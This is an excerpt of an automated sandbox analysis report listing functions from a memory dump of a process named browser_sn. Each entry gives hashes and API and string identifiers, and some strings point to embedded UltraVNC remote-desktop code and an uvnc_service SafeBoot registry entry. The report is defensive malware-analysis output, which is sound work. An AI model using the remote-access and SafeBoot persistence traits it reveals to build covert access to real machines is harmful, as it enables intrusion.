                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInitializeSection$AddressProc$LibraryLoad
                                                                            • String ID: GetPerTcpConnectionEStats$Iphlpapi.dll$SetPerTcpConnectionEStats$vsocket.cpp : VSocket() m_pDSMPlugin = NULL
                                                                            • API String ID: 3015439405-2946900448
                                                                            • Opcode ID: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                            • Instruction ID: 096fe4c5af6c8876a12dee65b0c5524a32139f8afa7608ff7bd9b929915dc06c
                                                                            • Opcode Fuzzy Hash: b5c9a895933125692294ff2e15cdf7522bd1a19dbcf515155b618464db81f3f7
                                                                            • Instruction Fuzzy Hash: EA212971A14B8281EB80CF24E8841A833B4FB05B4EF544436CE9D97368EFBCD599D350
                                                                            Function 00007FF6C2C4D304 Relevance: 16.8, APIs: 11, Instructions: 254COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: free$_errno$EnvironmentVariable__wtomb_environ_invalid_parameter_noinfo
                                                                            • String ID:
                                                                            • API String ID: 101574016-0
                                                                            • Opcode ID: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                            • Instruction ID: 2ff01257e187c91d1f64a82f8e047065ffc166c8fdc30dab57b1185baeb3b4e9
                                                                            • Opcode Fuzzy Hash: 181369242843f9036f05e592b74b1e6aafa5b20a9f3d11d8321f47b8ab448537
                                                                            • Instruction Fuzzy Hash: EDA1AF69E09B4241FA95BF15A90027A22B4BF80B9EF549A34DF9DC77C5DEBCF4518300
                                                                            Function 00007FF6C2BAB510 Relevance: 16.7, APIs: 11, Instructions: 172filetimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$AttributesTime$BuffersCloseCountDeleteFlushHandleMoveSystemTick
                                                                            • String ID:
                                                                            • API String ID: 2697342021-0
                                                                            • Opcode ID: 3cdbb3c81f952b70d1ae05dd08e12069270f470a0136faf74d642e1c54183f65
                                                                            • Instruction ID: e8efcb3c28b56fc2feeffc863e2a554b893ffb11fea51a140ab6681448474374
                                                                            • Opcode Fuzzy Hash: 3cdbb3c81f952b70d1ae05dd08e12069270f470a0136faf74d642e1c54183f65
                                                                            • Instruction Fuzzy Hash: 08816726A08A8195EB90DF7094543EC3360EB55BAEF480235DFAD8B7DACFB8D159C314
                                                                            Function 00007FF6C2C48A7C Relevance: 16.6, APIs: 11, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno$FullNamePathfree$ErrorLast_invalid_parameter_noinfocalloc
                                                                            • String ID:
                                                                            • API String ID: 3219262609-0
                                                                            • Opcode ID: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                            • Instruction ID: 92a0f2953ea6b55e88d84c37c1a21c6fffb29f9056dc2988940577b6ef89c611
                                                                            • Opcode Fuzzy Hash: bfbee9e4b5986560eceb10190c14978969bf0a457ba4f53162cbca2fe3e34832
                                                                            • Instruction Fuzzy Hash: 80317250E0C65285FAD5AE515D502BB21B0AF45BDEF584A31EFDEC7BC6DEECA4408600
                                                                            Function 00007FF6C2BAD930 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$AddressProc$Initialize$FileHandleLibraryLoadModule$CountCreateEnterErrorLastLeaveMappingOpenSemaphoreTickView
                                                                            • String ID: ChangeWindowMessageFilter$GetCursorInfo$user32.dll
                                                                            • API String ID: 173432231-678763868
                                                                            • Opcode ID: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                            • Instruction ID: 2be2d711af2c52a38b4069e9330e3a98144c9c63d784d95fc7df9c0d74cad56f
                                                                            • Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
                                                                            • Instruction Fuzzy Hash: 9D41F831619B82A2E7489F24E9802E873B8FB45759F504136DBED837A4DFB9A4B5C300
                                                                            Function 00007FF6C2B86A20 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 78registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                            • API String ID: 3677997916-356703426
                                                                            • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                            • Instruction ID: 2664681306b093cd5bf0372cf2a26628a3ca833dc101733dce626995e2e3e87c
                                                                            • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                            • Instruction Fuzzy Hash: F7412C32A1864381EBA08F20E4953AA72B0FB5574EF501132DF8DC7799EFBCD5158B44
                                                                            Function 00007FF6C2B868F0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 62registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                                            • API String ID: 3677997916-1370392681
                                                                            • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                            • Instruction ID: b4f8c05ecca2524c8b354584b3a4f97a42c662c9460921c4e90d0e097eae4d20
                                                                            • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                            • Instruction Fuzzy Hash: E3312B71A18A4385EA908F21E4843AA3374FB4978EF801132DFCDC67D9EFADD1058B40
                                                                            Function 00007FF6C2BB07C0 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 60windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
                                                                            • String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
                                                                            • API String ID: 554953491-3667255696
                                                                            • Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                            • Instruction ID: e8642ffd78adcd833d5c9ac0a954c8b9ce628056cb4f42fc09a625adeb6a0e05
                                                                            • Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                            • Instruction Fuzzy Hash: 5C313435A08A8785EB40DFA0E8805A93370FB45B4DF880432DE8D97B59EFBCE105C790
                                                                            Function 00007FF6C2BB3170 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 48threadsynchronizationwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF6C2BB3246
                                                                            • vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF6C2BB319A
                                                                            • vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF6C2BB321D
                                                                            • vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF6C2BB31DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
                                                                            • String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
                                                                            • API String ID: 803186428-2751095142
                                                                            • Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                            • Instruction ID: e56b167d7d0a290d91ccd64f967a7e23cc2caa09cd87988cbbe98f23b56946b4
                                                                            • Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                            • Instruction Fuzzy Hash: 9A214D26A185C282E3409F65D4946F92369FF8970EF880832CE8EAA365CFBCA445C250
                                                                            Function 00007FF6C2B93110 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 48registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
                                                                            • String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
                                                                            • API String ID: 913464532-2910635102
                                                                            • Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                            • Instruction ID: 448b36803d8b7a6256cb44e834c47597f7d912f61c6497eccb546c345a481108
                                                                            • Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                            • Instruction Fuzzy Hash: 5B214A71A18A8282EBA0DF50F4457AA7360FB8535DF800135EBCC87B68DFBDD1198B40
                                                                            Function 00007FF6C2C459D8 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45A72
                                                                            • malloc.LIBCMT ref: 00007FF6C2C45ADB
                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45B0F
                                                                            • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45B36
                                                                            • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45B7E
                                                                            • malloc.LIBCMT ref: 00007FF6C2C45BDB
                                                                              • Part of subcall function 00007FF6C2C38C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6C2C38C64
                                                                              • Part of subcall function 00007FF6C2C38C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6C2C4329C,?,?,?,00007FF6C2C47749,?,?,?,00007FF6C2C477F3), ref: 00007FF6C2C38C89
                                                                              • Part of subcall function 00007FF6C2C38C34: _callnewh.LIBCMT ref: 00007FF6C2C38CA2
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CAD
                                                                              • Part of subcall function 00007FF6C2C38C34: _errno.LIBCMT ref: 00007FF6C2C38CB8
                                                                            • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45C10
                                                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6C2C45D15), ref: 00007FF6C2C45C50
                                                                            • free.LIBCMT ref: 00007FF6C2C45C64
                                                                            • free.LIBCMT ref: 00007FF6C2C45C75
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                            • String ID:
                                                                            • API String ID: 1080698880-0
                                                                            • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                            • Instruction ID: 1ca021172a564384a22a319441a60aa00c23a0e262ae54580c8dbfce5714b649
                                                                            • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                            • Instruction Fuzzy Hash: 0B81A132A08B4286EBA48F25D88017A76B1FB58BE9F144636DF9D83BD4DFBCD5058700
                                                                            Function 00007FF6C2BA6CAA Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 256COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
